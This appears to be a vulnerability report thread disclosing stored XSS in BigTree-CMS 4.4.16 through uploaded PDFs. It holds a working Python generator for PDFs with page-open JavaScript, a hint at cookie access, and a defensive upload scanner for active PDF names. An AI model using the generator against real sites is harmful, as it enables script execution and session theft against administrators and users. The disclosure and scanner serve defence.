A stored cross-site scripting (XSS) vulnerability exists in BigTree-CMS 4.4.16 that allows an authenticated user who is authorized to upload files to upload a malicious .pdf file that acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator, it will trigger an XSS attack.
Log in as admin and access the file upload page:
Use the following PoC to generate malicious files:
```python
import sys

from pdfrw import PdfWriter
from pdfrw.objects.pdfname import PdfName
from pdfrw.objects.pdfstring import PdfString
from pdfrw.objects.pdfdict import PdfDict
from pdfrw.objects.pdfarray import PdfArray


def make_js_action(js):
    action = PdfDict()
    action.S = PdfName.JavaScript
    action.JS = js
    return action


def make_field(name, x, y, width, height, r, g, b, value=""):
    annot = PdfDict()
    annot.Type = PdfName.Annot
    annot.Subtype = PdfName.Widget
    annot.FT = PdfName.Tx
    annot.Ff = 2
    annot.Rect = PdfArray([x, y, x + width, y + height])
    annot.MaxLen = 160
    annot.T = PdfString.encode(name)
    annot.V = PdfString.encode(value)

    # Default appearance stream: can be arbitrary PDF XObject or
    # something. Very general.
    annot.AP = PdfDict()
    ap = annot.AP.N = PdfDict()
    ap.Type = PdfName.XObject
    ap.Subtype = PdfName.Form
    ap.FormType = 1
    ap.BBox = PdfArray([0, 0, width, height])
    ap.Matrix = PdfArray([1.0, 0.0, 0.0, 1.0, 0.0, 0.0])
    ap.stream = "%f %f %f rg\n0.0 0.0 %f %f re f\n" % (r, g, b, width, height)

    # It took me a while to figure this out. See PDF spec:
    # https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf_reference_1-7.pdf#page=641
    # Basically, the appearance stream we just specified doesn't
    # follow the field rect if it gets changed in JS (at least not in
    # Chrome).
    # But this simple MK field here, with border/color
    # characteristics, _does_ follow those movements and resizes, so
    # we can get moving colored rectangles this way.
    annot.MK = PdfDict()
    annot.MK.BG = PdfArray([r, g, b])

    return annot


def make_page(fields, script):
    page = PdfDict()
    page.Type = PdfName.Page
    page.Resources = PdfDict()
    page.Resources.Font = PdfDict()
    page.Resources.Font.F1 = PdfDict()
    page.Resources.Font.F1.Type = PdfName.Font
    page.Resources.Font.F1.Subtype = PdfName.Type1
    page.Resources.Font.F1.BaseFont = PdfName.Helvetica
    page.MediaBox = PdfArray([0, 0, 612, 792])
    page.Contents = PdfDict()
    page.Contents.stream = "BT\n/F1 24 Tf\nET\n"

    annots = fields

    page.AA = PdfDict()
    # You probably should just wrap each JS action with a try/catch,
    # because Chrome does no error reporting or even logging otherwise;
    # you just get a silent failure.
    page.AA.O = make_js_action(
        "try {\n%s\n} catch (e) {\n  app.alert(e.message);\n}\n" % (script))

    page.Annots = PdfArray(annots)
    return page


if len(sys.argv) > 1:
    js_file = open(sys.argv[1], 'r')

    # Leading '/// name x y width height r g b' lines declare form fields;
    # the whole file is then used as the script run when the page opens.
    fields = []
    for line in js_file:
        if not line.startswith('/// '):
            break
        pieces = line.split()
        params = [pieces[1]] + [float(token) for token in pieces[2:]]
        fields.append(make_field(*params))

    js_file.seek(0)

    out = PdfWriter()
    out.addpage(make_page(fields, js_file.read()))
    out.write('result.pdf')
```
Back on the Files page, we can see that result.pdf has been uploaded:
When the administrator clicks result.pdf it will trigger an XSS attack. In addition, after switching to a normal user, the normal user still has permission to access /site/index.php/admin/files/result.pdf and trigger an XSS attack.
Do you have a proposed solution for this? It would seem that the XSS vulnerability is within the browser itself if any uploaded PDF can potentially execute JavaScript for the domain on which it is present.
Does the PDF have access to the domain's cookies or is the attack surface limited to just annoyances?
The implementation of document.cookie can be achieved by modifying the exp; see https://github.com/osnr/horrifying-pdf-experiments for details. Updating the upload component to review the contents of the .pdf file before uploading is a good idea.
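As an added example (not from this issue or the BigTree project), the upload-time content check the previous comment suggests: a scanner that flags the PDF name objects behind the PoC (/JavaScript, /JS, /AA, /OpenAction, /Launch), decodes #xx-escaped names and inflates FlateDecode streams so that object streams cannot hide them. The sample PDFs are constructed inline and the function and constant names are my own.

```python
import re
import zlib

# PDF name objects that mark active content: JavaScript actions, additional-action
# dictionaries (/AA, the hook the PoC on this page uses), document open actions and
# launch actions (PDF 1.7 reference, chapter 8, Interactive Features).
ACTIVE_NAMES = (b"JavaScript", b"JS", b"AA", b"OpenAction", b"Launch")

# A name is "/" followed by a run of non-whitespace, non-delimiter bytes.
_NAME_RE = re.compile(rb"/([^\s/\[\]<>(){}%]+)")
_STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)

def _decode_name(raw: bytes) -> bytes:
    # Any byte of a name may be written as #xx, so /J#53 is the same name as /JS.
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), raw)

def _inflate_streams(data: bytes):
    # Yield the inflated body of every FlateDecode stream; object streams
    # (/Type /ObjStm) can carry whole dictionaries, so they must be scanned too.
    # decompressobj tolerates the EOL bytes the regex leaves around the body.
    for m in _STREAM_RE.finditer(data):
        try:
            yield zlib.decompressobj().decompress(m.group(1))
        except zlib.error:
            continue

def find_active_content(data: bytes) -> list:
    """Return the sorted active-content names found anywhere in a PDF byte string."""
    found = set()
    for layer in [data] + list(_inflate_streams(data)):
        for m in _NAME_RE.finditer(layer):
            name = _decode_name(m.group(1))
            if name in ACTIVE_NAMES:
                found.add(name.decode("ascii"))
    return sorted(found)

# Constructed samples, not real uploads. BENIGN is a bare page; PLAIN carries the
# page-open (/AA /O) JavaScript action the PoC generator emits; HIDDEN puts the
# same action, with /JS spelled as /J#53, inside a compressed stream.
BENIGN_PDF = (b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
              b"3 0 obj\n<< /Type /Page /MediaBox [0 0 612 792] >>\nendobj\n%%EOF\n")
PLAIN_PDF = (b"%PDF-1.7\n3 0 obj\n<< /Type /Page /AA << /O << /S /JavaScript "
             b"/JS (app.alert(1)) >> >> >>\nendobj\n%%EOF\n")
_body = zlib.compress(b"<< /S /JavaScript /J#53 (app.alert(1)) >>")
HIDDEN_PDF = (b"%PDF-1.7\n4 0 obj\n<< /Length " + str(len(_body)).encode()
              + b" /Filter /FlateDecode >>\nstream\n" + _body + b"\nendstream\nendobj\n%%EOF\n")
```

Rejecting such files at upload complements, rather than replaces, serving user uploads with Content-Disposition: attachment or from a separate origin, since the stored XSS here depends on the PDF being rendered inline on the CMS origin.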